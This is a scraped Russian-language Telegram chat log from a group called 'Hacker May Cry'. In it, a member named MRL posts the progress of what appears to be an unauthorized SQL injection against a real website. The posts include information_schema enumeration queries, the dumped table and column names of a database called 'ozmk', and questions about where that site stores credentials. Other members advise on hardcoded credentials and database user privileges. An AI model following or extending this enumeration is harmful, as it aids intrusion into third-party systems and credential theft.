Телеграмм чат группы mrl

Size: a a a

Hacker May Cry

2019 February 23

SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'CHARACTER_SETS'
CHARACTER_SET_NAME,DEFAULT_COLLATE_NAME,DESCRIPTION,MAXLEN

SELECT CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'CHARACTER_SETS' LIMIT 1,1
DEFAULT_COLLATE_N

SELECT CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'USER_PRIVILEGES’ LIMIT 1,1



SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'CLIENT_STATISTICS'
CLIENT,TOTAL_CONNECTIONS,CONCURRENT_CONNECTIONS,CONNECTED_TIME,BUSY_TIME,CPU_TIME,BYTES_RECEIVED,BYTES_SENT,BINLOG_BYTES_WRITTEN,ROWS_READ,ROWS_SENT,ROWS_DELETED,ROWS_INSERTED,ROWS_UPDATED,SELECT_COMMANDS,UPDATE_COMMANDS,OTHER_COMMANDS,COMMIT_TRANSACTIONS,ROLLBACK TRANSACTIONS,DENIED_CONNECTIONS,LOST_CONNECTIONS,ACCESS_DENIED,EMPTY_QUERIES


SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'USER_PRIVILEGES'
GRANTEE,TABLE_CATALOG,PRIVILEGE_TYPE,IS_GRANTABLE



SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'KEY_CACHES'
KEY_CACHE_NAME,SEGMENTS,SEGMENT_NUMBER,FULL_SIZE,BLOCK_SIZE,USED_BLOCKS,UNUSED_BLOCKS,DIRTY_BLOCKS,READ_REQUESTS,READS,WRITE_REQUESTS,WRITES

SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'XTRADB_ADMIN_COMMAND'
resu t_message

SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'USER_PRIVILEGES'
GRANTEE,TABLE_CATALOG,PRIVILEGE_TYPE,IS_GRANTABLE

SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'INNODB_SYS_COLUMNS'
TABLE_ID,NAME,POS,MTYPE,PRTYPE,LEN

SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'INNODB_SYS_TABLES'
TABLE_ID,SCHEMA,NAME,FLAG,N_COLS,SPACE

SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'TABLES'
TABLE_CATALOG,TABLE_SCHEMA,TABLE_NAME,TABLE_TYPE,ENGINE,VERSION,ROW_FORMAT,TABLE_ROWS,AVG_ROW_LENGTH,DATA_LENGTH,MAX_DATA_LENGTH,INDEX_LENGTH,DATA_FREE,AUT_INCREMENT,CREATE_TIME,UPDATE_TIME,CHECK_TIME,TABLE_COLLATION,CHECKSUM,CREATE_OPTIONS,TABLE_COMMENT

SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'PROFILING'
QUERY_ID,SEQ,STATE,DURATION,CPU_USER,CPU_SYSTEM,CONTEXT_VOLUNTARY,CONTEXT_INVOLUNTARY,BLOCK_OPS_IN,BLOCK_OPS_OUT,MESSAGES_SENT,MESSAGES_RECEIVED,PAGE_FAULTS_MAJOR,PAGE_FAULTS_MINOR,SWAPS,SOURCE_FUNCT ON,SOURCE_FILE,SOURCE_LINE

источник

01:06пожаловаться

kazgeek in Hacker May Cry

MRL

SELECT GROUP_CONCAT(table_name) FROM information_schema.tables

CHARACTER_SETS,CLIENT_STATISTICS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COL  N      LEGES,ENGINES,EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,INDEX_STATISTICS,KEY_CACHES,KEY_COLUMN_USAGE,PARAMETERS,PARTITIONS,PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINTS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SESSION_VARIABLES,STATISTICS,TABLES,TABLESPACES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TABLE_STATISTICS,TRIGGERS,USER_PRIVILEGES,USER_STATISTICS,VIEWS,INNODB_CMPMEM_RESET,INNODB_RSEG,INNODB_UNDO_LOGS,INNODB_CMPMEM,INNODB_SYS_TABLESTATS,INNODB_LOCK_WAITS,INNODB_INDEX_STATS,INNODB_CMP,INNODB_CMP_RESET,INNODB_CHANGED_PAGES,INNODB_BUFFER_POOL_PAGES,INNODB_TRX,INNODB_BUFFER_POOL_PAGES_INDEX,INNODB_LOCKS,INNODB_BUFFER_POOL_PAGES_BLOB,INNODB_SYS_TABLES,INNODB_SYS_FIELDS,INNODB_SYS_COLUMNS,INNODB_BUFFER_PAGE,INNODB_SYS_STATS,INNODB_SYS_FOREIGN,INNODB_SYS_INDEXES,XTRADB_ADMIN_COMMAND,INNODB_TABLE_STATS,INNODB_SYS_FOREIGN_COLS,INNODB_BUFFER_PAGE_LRU,INNODB_BUFFER_POOL_STATS

Она не вытянула таблицы, это сама information_schema.

источник

05:41пожаловаться

MRL in Hacker May Cry

kazgeek

Она не вытянула таблицы, это сама information_schema.

Затупил ночью, спасибо))

источник

08:35пожаловаться

Илья in Hacker May Cry

И я бухой тож тут ночью умничал😱

источник

09:05пожаловаться

MRL in Hacker May Cry

 mappoint     
 oz_articles  
 oz_images    
 oz_news      
 oz_objects   
 oz_partners  
 oz_questions 
 oz_tree      
 oz_units

источник

09:07пожаловаться

Илья in Hacker May Cry

А еще есть какие-либо?

источник

09:16пожаловаться

MRL in Hacker May Cry

нет, это все таблицы

источник

09:16пожаловаться

MRL in Hacker May Cry

тяну колонки

источник

09:17пожаловаться

MRL in Hacker May Cry

Table: mappoint
user         
 view         
 cx           
 cy           
descriptions 
 id
 name

Table: oz_units
table  
id     
is_vis 
name 
pid  
sort

Table: oz_tree
content         
id
is_vis
link
name
pid
plugin
position_bottom
position_top
sort
tiptosearch

Table: oz_objects
customer
id
is_vis
location
photo
photo1
sort
text

источник

10:41пожаловаться

MRL in Hacker May Cry

где он хранит креды?Оо

источник

10:42пожаловаться

Илья in Hacker May Cry

Какие вообще есть базы?

источник

10:43пожаловаться

MRL in Hacker May Cry

available databases [2]:
[*] information_schema
[*] ozmk

источник

10:44пожаловаться

Илья in Hacker May Cry

В первой точно кредов не бывает

источник

10:44пожаловаться

Илья in Hacker May Cry

Это системная

источник

10:44пожаловаться

MRL in Hacker May Cry

А пароль от phpmyadmin дефолтно где хранится?

источник

10:46пожаловаться

kazgeek in Hacker May Cry

MRL

где он хранит креды?Оо

Может в коде вшиты

источник

11:14пожаловаться

Test Test in Hacker May Cry

Я могу ошибаться, но есть вероятность что у тебя запрос, куда ты инжектишься, выполняется из под пользователя, у которого нет доступ к нужной тебе таблице

источник

11:24пожаловаться

ID:531453784 in Hacker May Cry

@rutsky будет жить. Поприветствуем!

источник

11:30пожаловаться

MRL in Hacker May Cry

Test Test

Действительно из под пользователя

источник

11:40пожаловаться

ID:531453784 in Hacker May Cry

@Maphioznic303 будет жить. Поприветствуем!

источник

20:34пожаловаться